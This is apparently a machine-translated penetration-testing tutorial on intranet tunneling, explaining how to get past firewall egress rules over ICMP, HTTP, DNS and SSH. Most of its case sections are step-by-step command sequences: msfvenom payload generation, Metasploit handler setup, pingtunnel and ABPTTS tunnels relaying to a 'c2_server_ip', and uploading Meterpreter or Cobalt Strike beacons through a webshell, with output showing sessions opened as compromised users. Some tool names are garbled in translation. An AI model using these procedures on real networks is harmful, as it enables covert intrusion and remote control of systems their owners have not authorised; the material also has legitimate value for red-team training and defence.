Penetration Testing Intranet Penetration (2): Intranet Penetration

I. Introduction

There are many articles about intranet penetration on the Internet, but most of them focus on the use of tools, and the principles are rarely mentioned. This article will start with the principle of intranet traversal, and flexibly design the corresponding intranet traversal scheme according to different intranet outbound and inbound situations.

2. The principle of intranet penetration

Intranet penetration is: using various tunneling technologies to bypass the blockade of the network firewall with the protocol allowed by the network firewall, so as to access the blocked target network.

What is tunnel technology? Let's look at the explanation of the encyclopedia entry

Tunneling is a method of passing data between networks by using the infrastructure of the internetwork. The data (or payload) transmitted through the tunnel may be data frames or packets of different protocols. The tunneling protocol re-encapsulates the data frames or packets of these other protocols in new packet headers and sends them. The new header provides routing information so that the encapsulated payload data can be passed across the Internet. The encapsulated packets are routed through the public internetwork between the two endpoints of the tunnel. The logical path through which the encapsulated data packets are transmitted on the public Internet is called a tunnel. Once at the end of the network, the data is unpacked and forwarded to the final destination. Note that tunnel technology refers to the whole process including data encapsulation, transmission and unpacking.

The tunneling technologies we commonly use for intranet penetration include dns tunneling, http tunneling, ssh tunneling, icmp tunneling and other protocols that are easily allowed by network firewalls.

These tunneling technologies can be layered according to the protocol layer they are in.

• network layer tunnel

  ICMP tunneling, etc.

• transport layer tunnel

  TCP tunnel, UDP tunnel

• application layer tunnel

  HTTP, DNS, SSH and other tunnels

All possible access methods of intranet hosts

• Allow the ICMP protocol to go out of the network

  The network firewall allows the ICMP protocol to go out of the network, that is, it can ping the external network hosts, and generally can go out of the network

• Allow specific TCP or UDP protocol ports to go out of the network

  The network firewall allows specific TCP or UDP ports to go out of the network, such as the default listening ports of common applications such as 22, 53, 80, 443, and 3389 connected to the external network. In a network environment that cannot go out of the network, detect all the TCP and UPD ports, and usually one or two common ports can be found to go out of the network. This is usually the result of misconfiguration and laziness by the network administrator. For example, the configured firewall rules are inconsistent, and when parsing encounters matching rules, the execution will exit; for example, the network administrator configures port 3306 that allows the web server to access the mysql database of another subnet. The network administrator is lazy when configuring, and may directly release the web server to port 3306 of any ip address

• Allow specific application layer protocols to go out of the network (such as HTTP, SSH, DNS and other application layer protocols)

  This kind of network firewall can identify the protocols of the application layer and release the protocols that are allowed to go out of the network, such as HTTP, SSH, DNS, RDP and other application layer protocols; usually the office network allows the HTTP protocol to go out of the network, and the domain name whitelist may restrict the
  intranet All possible network access methods of the host

• Allow ICMP protocol to access the network

  Can ping the target host

• Allow specific TCP or UDP protocol ports to enter the network

  NAT port maps the public network IP port to the service port of the intranet host, such as NAT mapping web services and mysql services to the public network

• Allow specific application layer protocols to access the network

  This kind of network firewall can identify the protocols of the application layer and allow the protocols allowed to enter the network. For example, HTTP reverse proxy, which reversely proxies HTTP traffic received from the public network to the intranet host. The current mainstream network access method usually adds a layer of WAF to review the network traffic

  3. Common tools for intranet penetration

3.1. Network Layer Tunnel Tool

• icmpsh

  Can bounce cmd through ICMP protocol, single function, the bounced cmd is extremely unstable, not recommended

• icmptunnel

  Create a virtual network card to transmit network card traffic through the ICMP protocol. VPN based on ICMP tunnel requires root privileges, which is very dynamic and not recommended.

• pingtunnel

  tcp, udp, socks5 over ICMP, fast speed, stable connection, cross-platform, client mode can be used normally without administrator privileges, recommended

3.2. Transport Layer Tunneling Tool

• netcat

  The Swiss Army Knife in network tools, not much introduction, linux system generally comes with

• powercat

  netcat for powershell

• shocked

  It has the function of recording the forwarding flow, which is convenient for viewing the forwarding content. It needs to be installed

• netsh

  The network configuration tool that comes with the windows system

• lcx

  port forwarding tool

• NATBypass

  An implementation of lcx under golang, better cross-platform, better documentation

• joke

  Port forwarding & Intranet proxy tool, similar in function to lcx/ew, simplifies command line parameters, supports UDP traffic forwarding, better cross-platform. Disadvantages: does not support listening to specified IP, and listens to 0.0.0.0:port by default, which will increase the risk of exposure

3.3. Application Layer Tunneling Tool

Since there are many application layer protocols, there are also many corresponding tunneling tools. The protocols we often use for tunneling are DNS, HTTP, SSH, SOCKS, etc.

• dnscat2

  Not only can create DNS tunnel, but also C2

• dnscat2-powershell

  Powershell client for dnscat2

• dns2tcp

  TCP over DNS, that is, forwarding TCP connections through DNS tunnels

• iodine

  IPv4 over DNS, that is, forwarding IPv4 data packets through DNS tunnels

• reGeorg

  SOCKS over HTTP, that is, forward SOCKS through HTTP tunnel

• Neo-reGeorg

  A refactored version of reGeorg, improving stability and usability, avoiding feature detection, and actively updating

• reDuh

  TCP over HTTP, that is, forwarding TCP connections through the HTTP tunnel, the tunnel is unstable

• Barrel

  TCP, SOCKS over HTTP, that is, forwarding TCP connection and SOCKS through HTTP tunnel, the tunnel is unstable

• ABPTTS

  TCP over HTTP, that is, forwarding TCP connections through HTTP tunnels, data encryption, HTTP data can be customized, anti-feature detection is very good, and the tunnel created is very stable. Unfortunately, the supported web script types are only aspx and jsp

• EarthWorm

  Very convenient multi-level SOCKS proxy, has been permanently stopped updating

• Termite

  The upgraded version of EarthWorm has been permanently stopped updating

• Venom

  Venom is a multi-level proxy tool developed in Go designed for penetration testers.

• ssocks

  Forward and reverse socks tool with small executable size

• s5.go

  A socks service tool written in go language, with good cross-platform features

• ssh
  local forwarding:

  ssh -CNfg -L 127.0.0.1:7777:114.114.114.114:9999 [email protected]
  #ssh客户端监听127.0.0.1:7777, 将收到的tcp数据包通过连接到192.168.1.1的ssh隧道转发到ssh服务端，再由服务端转发到114.114.114.114:9999

  Remote forwarding:

  ssh -CNfg -R 127.0.0.1:7777:114.114.114.114:9999 [email protected]
  #ssh服务端监听127.0.0.1:7777, 将收到的tcp数据包通过连接到192.168.1.1的ssh隧道转发到ssh客户端，再由ssh客户端转发到114.114.114.114:9999

  Dynamic forwarding:

  ssh -CNfg -D 127.0.0.1:7777 [email protected]
  # ssh客户端监听127.0.0.1:7777开启socks服务，将收到的socks数据包通过连接到192.168.1.1的ssh隧道转发到ssh服务端，再由ssh服务端转发到目标地址

  Common parameters for building an ssh tunnel:

  -C 压缩传输，提高传输速度
  -f 后台执行数据传输
  -N 建立静默连接
  -g 允许远程主机连接本地用于转发的端口
  -L 本地端口转发
  -R 远程端口转发
  -D 动态转发，即SOCKS代理
  -p 指定ssh连接端口

4. Intranet penetration cases in actual combat

4.1. Intranet hosts with zero out-of-network online

Practical background: The host that obtained the webshell is located in the intranet, and the network layer protocols such as icmp of the intranet host cannot go out of the network, the transport layer protocols such as tcp and udp cannot go out of the network, and the application layer protocols such as dns and http cannot go out of the network. The data channel is a reverse proxy web application.

Design

Use the HTTP connection where the reverse proxy web application is located to build a forward TCP over HTTPtunnel. Through this tunnel, we can initiate a tcp connection to the intranet host. TCP over HTTPGenerate a bind-type payload, upload and execute it through the webshell, and it will monitor a port. Our remote control platform can go online by connecting to the monitored port through the constructed tunnel.

There are tools that can build TCP over HTTPtunnels ABPTTS、Tunna、reDuh, etc. Since Tunna、reDuhthe built tcp connection is unstable, it is selected here ABPTTS.

4.1.1, online metasploit

1. Build a tcp connection through a forward http tunnel

# 配置abptts运行环境
# 注意windows安装pycrypto库需要先安装依赖http://aka.ms/vcpython27
pip install httplib2
pip install pycrypto

# 生成server端脚本
python abpttsfactory.py -o server

# 上传server端脚本到web服务器，客户端运行以下命令
python abpttsclient.py -c server/config.txt -u "http://192.168.168.10/abptts.aspx" -f 127.0.0.1:7777/127.0.0.1:8888

# abptts客户端监听127.0.0.1:7777，通过http://192.168.168.10/abptts.aspx这个http隧道，将tcp连接127.0.0.1:7777转发到web服务器网络下的127.0.0.1:8888

2. Generate the payload of bind type, upload and execute it through webshell

# 这里的rhost和lport是转发的目的IP和端口
msfvenom -p windows/meterpreter/bind_tcp rhost=127.0.0.1 lport=8888 -f exe -o meterpreter.exe

3. Start msf monitoring and wait for meterpreter to go online

#这里的rhost和lport是abptts客户端监听的IP和端口，msf所在主机必须能访问到这个IP和端口，这里msf和abptts在同一个主机上

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf5 exploit(multi/handler) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf5 exploit(multi/handler) > set lport 7777
lport => 7777
msf5 exploit(multi/handler) > run

[*] Started bind TCP handler against 127.0.0.1:7777
[*] Sending stage (180291 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (0.0.0.0:0 -> 127.0.0.1:7777) at 2020-04-27 04:50:25 -0400

meterpreter > getuid
Server username: DESKTOP-0AH7FQ0\admin

4.1.2, launch cobaltstrike

Since cobaltstrike's bind type listeners only have beacon TCP and beacon SMB, and both must connect to the parent beacon, they cannot directly connect to the cobalstrike server, so we need a parent beacon to relay the connection.

1. Build a tcp connection through a forward http tunnel

# 配置abptts运行环境
# 注意windows安装pycrypto库需要先安装依赖http://aka.ms/vcpython27
pip install httplib2
pip install pycrypto

# 生成server端脚本
python abpttsfactory.py -o server

# 上传server端脚本到web服务器，客户端运行以下命令
python abpttsclient.py -c server/config.txt -u "http://192.168.168.121/abptts.aspx" -f 127.0.0.1:7777/127.0.0.1:8888

# abptts客户端监听127.0.0.1:7777，通过http://192.168.168.121/abptts.aspx这个http隧道，将tcp连接127.0.0.1:7777转发到web服务器网络下的127.0.0.1:8888

2. Create a reverse listener

3. Generate a parent beacon

4. Upload the parent beacon to the abptts client for execution

5. Create a listener whose payload is tcp beacon

6. Generate a stageless child beacon

7. Upload and execute the generated child beacon through webshell

# 可以通过webshell查看网络监听，确保子beacon执行成功
netstat -ano | findstr 127.0.0.1:8888

8. Connect the listening ip and port of abptts in the parent beacon

9. Successfully log in to the webshell intranet host that cannot go out of the network

4.2. On-line intranet hosts that only go out through the icmp protocol

Practical background: We obtained the shell of the intranet host through a certain channel, but the current channel is not suitable for remote control communication channels (such as a website with separated site and library, we obtained the shell of the database server through sql injection, but the database server only has icmp protocol can go out of the network), transport layer protocols such as tcp and udp cannot go out of the network, application layer protocols such as dns and http cannot go out of the network, and only icmp protocol can go out of the network.

Design

The icmp protocol can go out of the network, and the icmp protocol can be used to build a reverse TCP over ICMPtunnel or SOCKS over ICMPthe tunnel goes online to the remote control platform. The tool for building tunnels uses pingtunnel, which can forward tcp, udp, socks5 connections through icmp tunnels.

4.2.1, icmp tunnel forwarding tcp online metasploit

1. Prepare a server with public network ip, and run the following command with root authority to start the ICMP tunnel server

./pingtunnel -type server -noprint 1 -nolog 1

2. The ICMP tunnel client (that is, the host that needs to go online through the ICMP tunnel) executes the following command to successfully create a reverse ICMP tunnel

pingtunnel.exe -type client -l 127.0.0.1:9999 -s icmpserver_ip -t c2_server_ip:7777 -tcp 1 -noprint 1 -nolog 1
# 该命令的意思是icmp客户端监听127.0.0.1:9999，通过连接到icmpserver_ip的icmp隧道，将127.0.0.1:9999收到的tcp数据包转发到c2_server_ip:7777

3. Generate the meterpreter of the reverse payload and upload it to the ICMP tunnel client for execution to go online

msfvenom -p windows/meterpreter/reverse_https lhost=127.0.0.1 lport=9999 -f exe -o meterpreter.exe
# 这里的lhost和lport为icmp客户端监听ip和端口

4. Start msf monitoring and wait for meterpreter to go online

# 这里的lhost和lport为icmp客户端转发到的ip和端口

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf5 exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf5 exploit(multi/handler) > set lport 7777
lport => 7777
msf5 exploit(multi/handler) > run

[*] Started HTTPS reverse handler on https://0.0.0.0:7777

meterpreter > getuid
Server username: DESKTOP-test0\admin

4.2.2, icmp tunnel forwarding socks online metasploit

1. Prepare a server with public network ip, and run the following command with root authority to start the ICMP tunnel server

./pingtunnel -type server -noprint 1 -nolog 1

2. The ICMP tunnel client (that is, the host that needs to go online through the ICMP tunnel) executes the following command to successfully create a reverse ICMP tunnel

pingtunnel.exe -type client -l 127.0.0.1:6688 -s icmpserver_ip -sock5 1 -nolog 1 -noprint 1
# 该命令的意思是icmp隧道客户端监听127.0.0.1:6688启动socks5服务，通过连接到icmpserver_ip的icmp隧道，由icmpserver转发socks5代理请求到目的地址

3. Generate a meterpreter that supports the reverse payload of the socks5 proxy and upload it to the ICMP tunnel client for execution to go online

msfvenom -p windows/meterpreter/reverse_https LHOST=c2_server_ip LPORT=8443 HttpProxyType=SOCKS HttpProxyHost=127.0.0.1 HttpProxyPort=6688 -f exe -o meterpreter.exe

4. Start msf monitoring and wait for meterpreter to go online

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf5 exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf5 exploit(multi/handler) > set lport 8443
lport => 8443
msf5 exploit(multi/handler) > run

[*] Started HTTPS reverse handler on https://0.0.0.0:8443

meterpreter > getuid
Server username: DESKTOP-test0\admin

4.2.3, icmp tunnel forwarding tcp online cobaltstrike

1. Prepare a server with public network ip, and run the following command with root authority to start the ICMP tunnel server

./pingtunnel -type server -noprint 1 -nolog 1

2. The ICMP tunnel client (that is, the host that needs to go online through the ICMP tunnel) executes the following command to successfully create a reverse ICMP tunnel

pingtunnel.exe -type client -l 127.0.0.1:9999 -s icmpserver_ip -t c2_server_ip:7777 -tcp 1 -noprint 1 -nolog 1
# 该命令的意思是icmp隧道客户端监听127.0.0.1:9999，通过连接到icmpserver_ip的icmp隧道，将127.0.0.1:9999收到的tcp数据包转发到c2_server_ip:7777

3.cobaltstrike creates a listener

# https host和https port(c2)为icmp隧道客户端的监听ip和端口
# https port(bind)为转发目的地址的端口

4. Generate a beacon with a reverse payload

5. Upload the generated beacon to the ICMP tunnel client for execution, and successfully go online through the reverse ICMP tunnel

4.2.4, icmp tunnel forwarding socks online cobaltstrike

1. Prepare a server with public network ip, and run the following command with root authority to start the ICMP tunnel server

./pingtunnel -type server -noprint 1 -nolog 1

2. The ICMP tunnel client (that is, the host that needs to go online through the ICMP tunnel) executes the following command to successfully create a reverse ICMP tunnel

pingtunnel.exe -type client -l 127.0.0.1:6688 -s icmpserver_ip -sock5 1 -nolog 1 -noprint 1
# 该命令的意思是icmp隧道客户端监听127.0.0.1:6688启动socks5服务，通过连接到icmpserver_ip的icmp隧道，由icmpserver转发socks5代理请求到目的地址

3.cobaltstrike creates a listener

# 这里的代理可以是socks或者http
# 好像cobaltstrike不支持socks5代理，这里并不能成功上线
# 这里也可以使用http代理，不过需要工具将http代理转为socks5代理，比如privoxy

4. Select the created listener to generate a beacon and upload it to the target for execution to go online

V. Summary

The essence of intranet penetration in intranet penetration is nothing more than realizing the forwarding of transport layer protocol tcp/udp data packets through various communication channels, whether forward or reverse, and application layer protocols are based on transport layer protocols Achieved. for exampleABPTTS + SOCKS服务 = reGeorg

The conditions for intranet penetration in intranet penetration can be remote code execution through a certain communication channel. If remote code execution can be performed through a certain communication channel, the forwarding of tcp/udp data packets, that is, the TCP/UDP over somethingtunnel, can be realized through this communication channel. If there is no ready-made tool, we may need to develop it ourselves. For example, if the shell is obtained through sql injection, we can also use this communication channel to forward tcp/udp data packets. There is no ready-made tool, and we only need to develop tools. The tunnel client encapsulates the tcp/udp data packets into the database, and then The tunnel server reads the encapsulated data packet from the database, unpacks it, and sends it to the corresponding address.

6. Zero-Basic Introduction to Penetration Testing

For students who have never been exposed to network security/penetration testing, I have prepared a detailed learning and growth roadmap for you. It can be said that it is the most scientific and systematic learning route, and it is no problem for everyone to follow this general direction.